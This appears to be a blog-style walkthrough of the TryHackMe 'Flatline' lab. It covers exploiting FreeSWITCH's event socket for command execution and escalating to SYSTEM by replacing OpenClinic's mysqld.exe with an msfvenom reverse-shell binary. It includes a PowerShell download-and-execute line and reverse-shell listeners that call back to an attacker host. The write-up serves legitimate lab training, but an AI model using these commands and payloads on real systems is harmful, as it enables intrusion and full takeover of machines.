TryHackMe page for this machine => https://tryhackme.com/room/flatline
NOTE: I had to terminate and start the machine multiple times, as the exploit needed for foothold timed out multiple times. You may have to do the same.
Enum
rustscan nmap
rustscan -a 10.10.98.113 -- -A -Pn
Open 10.10.98.113:3389
Open 10.10.98.113:8021
PORT STATE SERVICE REASON VERSION
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WIN-EOM4PK0578N
| NetBIOS_Domain_Name: WIN-EOM4PK0578N
| NetBIOS_Computer_Name: WIN-EOM4PK0578N
| DNS_Domain_Name: WIN-EOM4PK0578N
| DNS_Computer_Name: WIN-EOM4PK0578N
| Product_Version: 10.0.17763
|_ System_Time: 2022-11-06T09:40:13+00:00
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Issuer: commonName=WIN-EOM4PK0578N
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-05T09:12:21
| Not valid after: 2023-05-07T09:12:21
| MD5: 3090 28ea a18f 37ce f134 275b 8a11 85b7
| SHA-1: 0594 e942 a7b3 ca04 7e4e 625c 6c0b 6903 f089 dde0
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQd/ojPAXxV75Ihn2h8kAwfTANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wHhcNMjIxMTA1MDkxMjIxWhcNMjMw
| NTA3MDkxMjIxWjAaMRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQClNnOLEC5U40F8dFZZtmmSj8zVa4Fqd0fU
| 3O+Pf/sDLF/23s4R6LkjvmjZaGNWMAVzlKwOMYJ3umlmLTRJJF0DEnaM79phGLba
| ePPbdRiUjUQFdBK9tyPpYCLB2m+K1z0YJLoXt8br7WSVp7Ho8Sz2E6sBZRM5H6QN
| ptO8j/syFSdLYWusTAp/gEQpVUoiElFcmDfa7rP2gQELHb03EvL9Gz9lPRrrVA3r
| XzEUNuqkG4J70LenFv7AH1j70FL48UStBESKYLaXaruRN8TkVjRWhmrYhC7tMVRB
| h8oVb8bcCvwqsw7VYEy197AdyePV0fkvjfbyrp6tstPMVm4hFM2FAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAfv/F86NeGYpqgaQz5Q+R5FrYkqnZoZBxrlbpG8rB9+hixOjRs6s6skjy
| x0IYovOcSXI3Sy4dh3GRjWn+hv5szbYzb4hKQojzw7CNScJSbTyGh7sJuGv1+hUe
| F6izAORicQkApcLweXv5MyVj1qUrmwWo4DpbG34nIf6W6hpNlW2VdWfCqIfjnEvy
| 3LOWrn++sncxXdBmg24fDNohJJFgvp3ui7VbmYVepe1SmqIql7vKt+qMV2kZv+cg
| SU1pZqYrHwwcpD3Qx6R7oqSVHjulW1eGTC6t+au8Oc6rytgamvbrCIGAwSUVcJLt
| pVkvw++/yMtWLoiiT+RCa2abEwEcPw==
|_-----END CERTIFICATE-----
|_ssl-date: 2022-11-06T09:40:13+00:00; 0s from scanner time.
8021/tcp open freeswitch-event syn-ack FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
Note: The machine keeps blocking ping probes. So use the nmap-Pn
flag when enumerating the machine!.
Port 3389 Enumeration
Let's use some nmap scripts to enumerate the port some more.
└─$ sudo nmap --script="rdp-*" -p 3389 flatline.thm -vv -Pn
PORT STATE SERVICE REASON
3389/tcp open ms-wbt-server syn-ack ttl 127
| rdp-ntlm-info:
| Target_Name: WIN-EOM4PK0578N
| NetBIOS_Domain_Name: WIN-EOM4PK0578N
| NetBIOS_Computer_Name: WIN-EOM4PK0578N
| DNS_Domain_Name: WIN-EOM4PK0578N
| DNS_Computer_Name: WIN-EOM4PK0578N
| Product_Version: 10.0.17763
|_ System_Time: 2022-11-06T09:55:55+00:00
| rdp-enum-encryption:
| Security layer
| CredSSP (NLA): SUCCESS
| CredSSP with Early User Auth: SUCCESS
|_ RDSTLS: SUCCESS
Port 8021 Enumeration
I wanted to see what in the world FreeSWITCH is. From Wikipedia https://en.wikipedia.org/wiki/FreeSWITCH
**FreeSWITCH* is free and open-source server software for real-time communication applications, including WebRTC, video, and voice over Internet Protocol (VoIP). It runs on Linux, Windows, macOS, and FreeBSD. FreeSWITCH is used to build private branch exchange (PBX) telecommunication systems, IVR services, videoconferencing with chat and screen sharing, wholesale least-cost routing, Session Border Controller (SBC) and embedded communication appliances.*
Let's look for some vulnerabilities.
└─$ searchsploit freeswitch
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit) | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution | windows/remote/47799.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Interesting. Let's try and get RCE without Metasploit.
Foothold
RCE without Metasploit
Using the script present here => https://www.exploit-db.com/exploits/47799
└─$ python3 exploit.py flatline.thm whoami
Authenticated
Content-Type: api/response
Content-Length: 25
win-eom4pk0578n\nekrotic
Looks like it works! Let's try and get a proper shell going on here.
└─$ python3 exploit.py 10.10.7.242 dir
Authenticated
Content-Type: api/response
Content-Length: 2346
Volume in drive C has no label.
Volume Serial Number is 84FD-2CC9
Directory of C:\Program Files\FreeSWITCH
09/11/2021 07:38 <DIR> .
09/11/2021 07:38 <DIR> ..
09/11/2021 07:22 <DIR> cert
09/11/2021 07:22 <DIR> conf
06/11/2022 10:33 <DIR> db
09/11/2021 07:18 <DIR> fonts
20/08/2019 12:08 4,991,488 FreeSwitch.dll
20/08/2019 12:08 26,624 FreeSwitchConsole.exe
20/08/2019 12:19 62,976 fs_cli.exe
09/11/2021 07:18 <DIR> grammar
---
SNIP
---
24/03/2018 20:20 15,766,528 v8.dll
24/03/2018 20:05 177,152 v8_libbase.dll
24/03/2018 20:19 134,656 v8_libplatform.dll
03/04/2018 14:01 126,976 zlib.dll
28 File(s) 96,800,060 bytes
17 Dir(s) 50,476,666,880 bytes free
Let's try and get the user flag.
└─$ python3 exploit.py 10.10.7.242 "dir C:\\Users\\"
Authenticated
Content-Type: api/response
Content-Length: 405
Volume in drive C has no label.
Volume Serial Number is 84FD-2CC9
Directory of C:\Users
09/11/2021 07:28 <DIR> .
09/11/2021 07:28 <DIR> ..
09/11/2021 07:13 <DIR> Administrator
09/11/2021 07:37 <DIR> Nekrotic
09/11/2021 07:13 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 50,457,559,040 bytes free
└─$ python3 exploit.py 10.10.7.242 "dir C:\\Users\\Nekrotic\\Desktop\\"
Authenticated
Content-Type: api/response
Content-Length: 374
Volume in drive C has no label.
Volume Serial Number is 84FD-2CC9
Directory of C:\Users\Nekrotic\Desktop
09/11/2021 07:39 <DIR> .
09/11/2021 07:39 <DIR> ..
09/11/2021 07:39 38 root.txt
09/11/2021 07:39 38 user.txt
2 File(s) 76 bytes
2 Dir(s) 50,446,991,360 bytes free
Wow. We seem to have found both files. We can read user.txt
.
But we can't read root.txt
. Probably a permissions issue.
Let's get a powershell reverse shell to see what's really going on.
Powershell Reverse Shell
- Save this file https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
- Delete the second shell comment. As for the first one, uncomment and replace IP and PORT as per your choice.
- Start a Python web server in the folder where you saved the powershell script. This is what we will use to serve the script.
- Download and execute the script on remote machine using the FreeSWITCH exploit.
Running the exploit
┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_flatline]
└─$ python3 exploit.py 10.10.7.242 "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.14.31.78/Invoke-PowerShellTcpOneLine.ps1')"
Run the web server to serve the Powershell reverse shell
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.7.242 - - [06/Nov/2022 06:20:12] "GET /Invoke-PowerShellTcpOneLine.ps1 HTTP/1.1" 200 -
Reverse Shell listener
┌──(kali㉿kali)-[~]
└─$ ncat -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.7.242.
Ncat: Connection from 10.10.7.242:49899.
PS C:\Program Files\FreeSWITCH> gci
Directory: C:\Program Files\FreeSWITCH
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 09/11/2021 07:22 cert
d----- 09/11/2021 07:22 conf
d----- 06/11/2022 10:33 db
d----- 09/11/2021 07:18 fonts
d----- 09/11/2021 07:18 grammar
....
SNIP
....
PS C:\Users\Nekrotic\Desktop> get-acl -path user.txt
Directory: C:\Users\Nekrotic\Desktop
Path Owner Access
---- ----- ------
user.txt WIN-EOM4PK0578N\Nekrotic NT AUTHORITY\SYSTEM Allow FullControl...
PS C:\Users\Nekrotic\Desktop> get-acl -Path root.txt
Directory: C:\Users\Nekrotic\Desktop
Path Owner Access
---- ----- ------
root.txt NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM Allow FullControl
Now we can see why we can't read root.txt
. We will need to escalate privileges to be able to read the file.
Privesc
While taking a look around the system, I came across this in the Administrator's desktop
PS C:\Users\Administrator\Desktop> gci
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 08/11/2021 18:24 108048384 FreeSWITCH-1.10.1-Release-x64.msi
-a---- 08/11/2021 06:05 413584335 OpenClinicSetup5.194.18_32bit_full_fr_en_pt_es_nl.exe
I am guessing this OpenClinic software is installed. Looking around the system further, we find its installation location at C:\projects\openclinic
.
PS C:\projects\openclinic> gci
Directory: C:\projects\openclinic
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 09/11/2021 07:29 jdk1.8
d----- 09/11/2021 07:19 mariadb
d----- 09/11/2021 07:30 tomcat8
d----- 09/11/2021 07:29 Uninstall
-a---- 06/04/2021 23:14 250 configureCountry.bat
-a---- 01/07/2021 18:20 167 configureLanguage.bat
-a---- 09/11/2021 07:18 334840 lua5.1.dll
-a---- 07/06/2021 16:58 93696 OpenClinic GA login.exe
-a---- 08/05/2020 12:17 27136 OpenClinicStartServices.exe
-a---- 02/05/2021 00:45 316 stopOpenClinicHttp.bat
-a---- 09/11/2021 07:18 1389568 uninstall.exe
Let's see what we can do with this.
┌──(kali㉿kali)-[~/Documents/ctf_tools]
└─$ searchsploit openclinic
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation | windows/local/50448.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Details of this exploit here => https://www.exploit-db.com/exploits/50448
According to the instructions we need to replace the mysqld.exe
present in the OpenClinic installation with a malicious payload generated by us.
Let's see if we have the permissions to do that.
PS C:\projects\openclinic\mariadb\bin> get-acl -Path .
Directory: C:\projects\openclinic\mariadb
Path Owner Access
---- ----- ------
bin BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow FullControl...
PS C:\projects\openclinic\mariadb\bin> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Looks like we can.
Let's begin.
Generate Payload
On our machine.
└─$ msfpc powershell 10.14.31.78 443 cmd reverse stageless exe
[*] MSFvenom Payload Creator (MSFPC v1.4.5)
[i] IP: 10.14.31.78
[i] PORT: 443
[i] TYPE: windows (windows/shell_reverse_tcp)
[i] CMD: msfvenom -p windows/shell_reverse_tcp -f exe \
--platform windows -a x86 -e generic/none LHOST=10.14.31.78 LPORT=443 \
> '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'
[i] windows shell created: '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'
[i] MSF handler file: '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'
[i] Run: msfconsole -q -r '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
└─$ mv windows-shell-stageless-reverse-tcp-443.exe mysqld.exe
On the server.
We will have to restart the computer as per the exploit instructions.
PS C:\projects\openclinic\mariadb\bin> mv mysqld.exe mysqld.exe.bak
PS C:\projects\openclinic\mariadb\bin> IWR -Uri http://10.14.31.78/mysqld.exe -OutFile mysqld.exe
PS C:\projects\openclinic> Restart-Computer
Now we wait for our reverse shell to activate.
└─$ ncat -lnvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.52.62.
Ncat: Connection from 10.10.52.62:49669.
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
DONE! Go get that root flag!
Top comments (0)